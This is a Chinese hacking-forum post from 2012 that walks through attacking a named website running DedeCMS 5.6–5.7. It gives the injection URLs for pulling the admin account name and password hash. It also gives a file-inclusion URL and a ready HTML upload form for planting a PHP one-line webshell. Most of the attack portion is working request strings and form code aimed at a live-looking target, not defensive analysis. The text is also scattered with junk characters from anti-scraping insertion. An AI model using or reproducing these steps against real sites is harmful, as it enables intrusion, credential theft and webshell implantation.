找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2896|回复: 0
打印 上一主题 下一主题

dedecms5.6-5.7注入与上传漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 10:56:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
①注入漏洞。% h! `' C, U- D) r
这站 http://www.political-security.com/9 }% P3 A- A+ _
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,# Y8 P+ ?8 G: z' v
www.political-security.com/data/mysql_error_trace.inc 爆后台
# N8 m- l! P- Y6 T& |& |8 V. Y然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
9 {# r& D; W/ |& r- r/ M. q然后写上语句
% m: e% v2 }1 }! G' {查看管理员帐号" ?4 T: u5 w* p* N, M' j' I6 V
http://www.political-security.co ... &membergroup=@`
7 O1 Q+ P0 y/ s" c" k1 x
/ t  U) v, n- G1 Dadmin
( R( t6 D% N5 A9 O# l) O  S4 P& J" n, j7 A9 G- J
查看管理员密码
8 j* b0 r% y9 ?* z% P# D) U1 b http://www.political-security.co ... &membergroup=@`
& A! ^* S; H5 z8 B" k2 U
  k7 f3 x0 W2 R# b  g- C- [8d29b1ef9f8c5a5af4298 ]  G3 ^& m/ j  ?0 I0 C, k
9 }8 S$ [/ b) c* T9 s% u0 j1 q
查看管理员密码# ^! B8 R! ~: d: a5 h& O

! t$ L  R+ e' R8 J# r  M得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
$ ~. q$ B- B) S7 T/ {$ E% o6 g# k3 g' {) w
8d2) t8 i! w! z( L
9b1ef9f8c5a5af42! q4 U& v! |8 e0 ?# o1 i4 ^# z* k! H
9
+ ^$ K* t& L. G
. l. H( O- o& A1 C' fcmd5没解出来 只好测试第二个方法! ?9 f0 U7 v6 e5 C6 E

: b, l. X6 W: P
( r/ I. u2 Q+ L; k# C5 `②上传漏洞:6 z/ |9 D* A+ `# l

* z+ T2 l2 V3 f/ v. X3 x9 U8 L只要登陆会员中心,然后访问页面链接, [6 t' n: h9 o1 x
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
2 Z4 M8 P, P0 R( ], n& b
7 i: J; G& H) N如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
" E* Z) D5 l1 v" b" Q8 }+ W! B$ ^. _8 y( C0 A2 w
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm6 ?. c+ _* V5 g5 K! p0 a
1 i. u( D8 V0 r, M0 W
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
; s! G8 b1 F) E' t1 F或者
' u1 @8 p( `7 d/ D+ b: m即可上传成功
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表